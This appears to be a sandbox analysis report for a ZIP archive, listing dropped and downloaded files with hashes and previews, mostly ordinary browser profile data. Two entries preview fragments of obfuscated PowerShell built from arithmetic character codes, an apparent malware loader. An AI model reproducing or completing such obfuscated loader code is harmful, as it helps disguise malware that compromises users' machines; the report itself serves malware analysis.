                                                                                                                                                                                                                                                                                                                                                      SHA-512:F604DC3405317863D120AA85EE4617D91FB9346CB4CEE66E4C7970FF76A5565120603F4EB502206A27A82D9C8F1EA667DBB8AD4D6F5B313D74D08CE6C5FD82BB
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):13162
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487212618258305
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:jnGRvo1YYbBp6PKDLZwxhaXJ6+RLNONy5RuFNBw8dqSl:8e3Fwx9ixvEw90
                                                                                                                                                                                                                                                                                                                                                      MD5:9B801C625E2E1C741D62E2CEBB308F25
                                                                                                                                                                                                                                                                                                                                                      SHA1:7E0A3C91B22AA12755A74CA3A7FF8BA2E6A4B0BA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:CE494323D85F73C6D9588C2D797878AABD381F11C6CAB7D5156F3E807101FFFA
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EEA9CCCDFAF5C798F14E435D3F9254BD2D2FA423184862835050734C274192A3A75FDAE5D56145522050B391AD7BA3FB0A27678DF70702CD5B0C69B5A0542357
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "0dbf219f-4e18-464a-957c-ae336603cdcc");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1736889265);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173688
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):13162
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487212618258305
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:jnGRvo1YYbBp6PKDLZwxhaXJ6+RLNONy5RuFNBw8dqSl:8e3Fwx9ixvEw90
                                                                                                                                                                                                                                                                                                                                                      MD5:9B801C625E2E1C741D62E2CEBB308F25
                                                                                                                                                                                                                                                                                                                                                      SHA1:7E0A3C91B22AA12755A74CA3A7FF8BA2E6A4B0BA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:CE494323D85F73C6D9588C2D797878AABD381F11C6CAB7D5156F3E807101FFFA
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EEA9CCCDFAF5C798F14E435D3F9254BD2D2FA423184862835050734C274192A3A75FDAE5D56145522050B391AD7BA3FB0A27678DF70702CD5B0C69B5A0542357
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "0dbf219f-4e18-464a-957c-ae336603cdcc");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1736889265);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173688
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 1, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04062825861060003
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:lSGBl/l/zl9l/AltllPltlnKollzvulJOlzALRWemFxu7TuRjBFbrl58lcV+wgn8:ltBl/lqN1K4BEJYqWvLue3FMOrMZ0l
                                                                                                                                                                                                                                                                                                                                                      MD5:60C09456D6362C6FBED48C69AA342C3C
                                                                                                                                                                                                                                                                                                                                                      SHA1:58B6E22DAA48C75958B429F662DEC1C011AE74D3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:FE1A432A2CD096B7EEA870D46D07F5197E34B4D10666E6E1C357FAA3F2FE2389
                                                                                                                                                                                                                                                                                                                                                      SHA-512:936DBC887276EF07732783B50EAFE450A8598B0492B8F6C838B337EF3E8A6EA595E7C7A2FA4B3E881887FAAE2D207B953A4C65ED8C964D93118E00D3E03882BD
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):90
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                                                                                      MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                                                                                      SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                                                                                      SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):90
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                                                                                      MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                                                                                      SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                                                                                      SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 5786 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1515
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.244336343276107
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:vYSUGliG0XizUXzK7GLXV+N62PHYB+mkDT5sQMGULlBwAHH9Qx2yhw1DCQf9qvAG:ApbXJK7GgNqB+mqGoAHaxI2ukzT8Gj
                                                                                                                                                                                                                                                                                                                                                      MD5:4B494ABE383A95058AFCCDA99C93C137
                                                                                                                                                                                                                                                                                                                                                      SHA1:EC92E3E3BC42A492721026B1664D0BA69211EE7F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:40FD1DEE9F9B2D8F8A3523F57590E2FE057567E4D3BE9D1D92BAF3EBAEB2B4E3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:4C8A8C90B5FDF1F9BA31AB407A5A46669E5B35AC0DEBB75DDD4F8C2FE27FD2558C2CD66B4531B13979FAF353D4CD6B1D37367F9FB4707D3554D55232E8742B0A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4537
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032539570921985
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YrSAYAfpUQZpExB1+anOdWtVheTV2hWUzzc89YMsku7f86SLAVL7Kl5FtsfAcbyk:ycAfdTEr59kUzzctvbw6KkqRrc2Rn27
                                                                                                                                                                                                                                                                                                                                                      MD5:BFECA4A78ECD60F8AAAD61A86018E500
                                                                                                                                                                                                                                                                                                                                                      SHA1:286C05D6C29CED67ED15F6F3EAECCB67AA23D000
                                                                                                                                                                                                                                                                                                                                                      SHA-256:807BC88BF6275E8E1C078A285F0F9218A82B9B72BAFC2DA44E783BA096319A6D
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EB27CE5C32EFAB54CC2D12FCFDD043967BEA4FBE3BB062D5E5C388E15515052A185D227975CF4B87722A32E3CD61964E860479E0D7CD8885952EDD285E8BEC22
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2025-01-14T21:14:10.759Z","profileAgeCreated":1696583300378,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3179333
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.001308946799799
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:U+x3EixTqfH3LXa1XHRwf6wrFmazg+mrG6Fj2FXwV:p
                                                                                                                                                                                                                                                                                                                                                      MD5:3123E4DFD1F0514DC18CF84688854E23
                                                                                                                                                                                                                                                                                                                                                      SHA1:36C947A1DFB747C5E7964E549A6D3F20C3223446
                                                                                                                                                                                                                                                                                                                                                      SHA-256:DB0975704EC411DAF247E177F3EF12C0DEE36D47DEC713B90E79BD49CD2F163E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:21EB2F5AECD9B62CF37589F2E9E0EF6FE73A65CD9BB2758742B5DDCED59A74664CDEACF6589D458CD1D5508166556082F474B99DB0059F394548A457C40219EE
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:$no768xrud1w2bsz = "
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10739)
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):19160
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.011261050746465
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:r7r3U9QIzR1Yof/6U7Mu/nG3bYVJ2PFDh89ssb1mU/1:fraRaoHau/6sMg9sGsa
                                                                                                                                                                                                                                                                                                                                                      MD5:95E836F844271D872C1DFB273DE12498
                                                                                                                                                                                                                                                                                                                                                      SHA1:0AE2B226CDBF9AF9DF010EC9B577084BB65BE370
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F499A7A6DBF8D0B82B6EF4111203D442A9D7D5CEE6ACDB5751E870D88C2C83F9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D9CA46654020A60FE25C71B5E0DA77387498B8217CE790E4546C493E1F42810A061AD426735C48F9B8CEFA38227163DEB91045E4657759AAB52D714614F7A845
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:$cqhtojrfusblnm=$executioncontext;$ederreononedesenenalaterrealonorisenal = (-jOIn (@((5271-5218),(90480/1740),(256215/(36823040/8192)),(-7139+7189),(-7141+(5120+(1394+683))),(516564/9566),(5199-(9508-4365)),(131285/2387),(269170/(13756-8862)),(9368-(14222-4904)),(-3272+3328),(-7965+(22051776/(12511-(1567+8192)))),(-19+68),(-4776+(42744688/8848)),(25376/488),(322224/(3424+2330)),(510840/9460),(8711-(5159+(3666-170))),(-7675+7731),(-711+(4096-3336)),(7227-7173),(2169-(2537-424)),(1801-(-427+2173)),(1934-1882),(74305/(-2465+3816)),(-3243+3293),(-9109+9165),(-8204+(-1338+(7735+1855))),(-8002+8057),(253450/5069),(399840/(5155+1985)),(-7277+(-4+7330)),(3220-(287924/(-7118+7209))),(-1095+(5920200/(7386-2238))),(-4408+4457),(506110/9202),(3674-(2782+(-7343+(6256+1928)))),(-6896+6950),(-339+395),(864-808),(7598-(60728184/8052)),(5925-5870),(270872/4837),(92950/(249+(-7797+(15060607/(874146/546))))),(1218-(4503-(5057-1716))),(271056/5647),(-94+(18944/(776832/6069))),(-7408+7464),(5237-5181),(-3
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (819)
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):824
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.151421972306547
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:j5W7oLiMkO2BHslgT9lCuABATluoB7HHHHHHHYqmffffffo:j5WM9kRKlgZ01BAxuSEqmffffffo
                                                                                                                                                                                                                                                                                                                                                      MD5:2CA1A00304976B40A0FFF0DADEB3FB30
                                                                                                                                                                                                                                                                                                                                                      SHA1:2068E467C2DD9D61B22F5BB3F30A095D7FA010DC
                                                                                                                                                                                                                                                                                                                                                      SHA-256:B6E007EBEA3845AB5259AB6CFAA0B95C1E7C717644464A3F3167C11C335995C9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:ADFEBC9F7728DA9C5EBAED4C342C929192650D1BC49E5930AF108358A8017A5C77527A242642FA7E0F8AC19247679FFB0C3C503AF309D12683C90ADB42492F77
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                                                      Preview:)]}'.["",["powerball lottery numbers","nfl kansas city chiefs","lincoln wheat penny rare coin","warzone update patch notes","moon mars occultation","sb mowing gofundme beth","east tennessee school closings","jpmorgan chase bank"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"3700822862954002470","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):175017
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.547141709627909
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:ZzKYRicPAENEJ8X5rpzKSoi5O4NmHha+q5ByukhCOWomLCHiYyKfQ1fbK0jOJv6B:ZzKYRPAENEJ+pKSoUO4NmHhbq5ByukhM
                                                                                                                                                                                                                                                                                                                                                      MD5:DE73B70C2E96AA995C1D89F9DE01D399
                                                                                                                                                                                                                                                                                                                                                      SHA1:D72592A0BF7FC706B4063B146FA0F505D9598E37
                                                                                                                                                                                                                                                                                                                                                      SHA-256:47051D5F0947B959605CA98298809213203547BD992E9EC13557B40547F5228F
                                                                                                                                                                                                                                                                                                                                                      SHA-512:7C01A3EC31D67C79BDBFFCF166E8F61DFED6EBCEF56F0BBFAE4EFAA363E0F797E397C054183AC16515F1AA34B1C6E19ABB2EBF3F9C5CA85EEAE9B173D657028B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WSo7OLdFZck.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu3OIbomB3nx1wiDyRkhdiMoOpjsA"
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):133118
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4343360420516635
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:fekAu9kJGkLpS+QVHTZxKtujNMoDI7VW2i6e:fyueFS7jxKtujNMo07VW8e
                                                                                                                                                                                                                                                                                                                                                      MD5:0B3991E075F0FC007AF6401DD4CAEA24
                                                                                                                                                                                                                                                                                                                                                      SHA1:0824219D587694904569A16A8F1C973A3D2233B4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1FC21516C6609A6FD1E98FA882254458E179805AF2FFFAC155E4B3ECBE9C4767
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D07BAA8062C844DF6BE00E974F29ECBD1800ABD2AC5B598340F58D68E3B37D3951B0B108C5428D0F406169A1552A6CA7F4899C8AA1FF824136207F4D9798486E
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):117446
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                                                                                                      MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                                                                                                      SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                                                                      MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                                                                      SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                                                                      SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvDtorsWuiBHYzP5-lS7pwgoAa95g"
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                                                                      SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                                                                      SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1844), with no line terminators, with escape sequences
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1844
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7184942276105466
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:HCmi0j0Bat20uCmgCmEfsc9cVCmVUoloDd8IwRP94Yl64CbhU:Ei8m
                                                                                                                                                                                                                                                                                                                                                      MD5:37F6B3082668DD6BF09B75C1BAD67A74
                                                                                                                                                                                                                                                                                                                                                      SHA1:85DAEA5638191DA6D5B50783ECE9F1DAE0E3BD14
                                                                                                                                                                                                                                                                                                                                                      SHA-256:514DF53016BA1AA7F45D7CD8D9A1CC720A5728292078F02E43673170DBAFDF58
                                                                                                                                                                                                                                                                                                                                                      SHA-512:3D880EDB2F4B3B8E3F9114FCACFDF65C4A2BA2C0BDE253FC1473E7A64479D5AD0FEB11EC0E7842BBBAAC9517C4654EDBAAA37A5993E76E5C63BFBA86392F333E
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999921625689197
                                                                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                                                                      • ZIP compressed archive (8000/1) 100.00%
                                                                                                                                                                                                                                                                                                                                                      File name:527.zip
                                                                                                                                                                                                                                                                                                                                                      File size:2'409'320 bytes
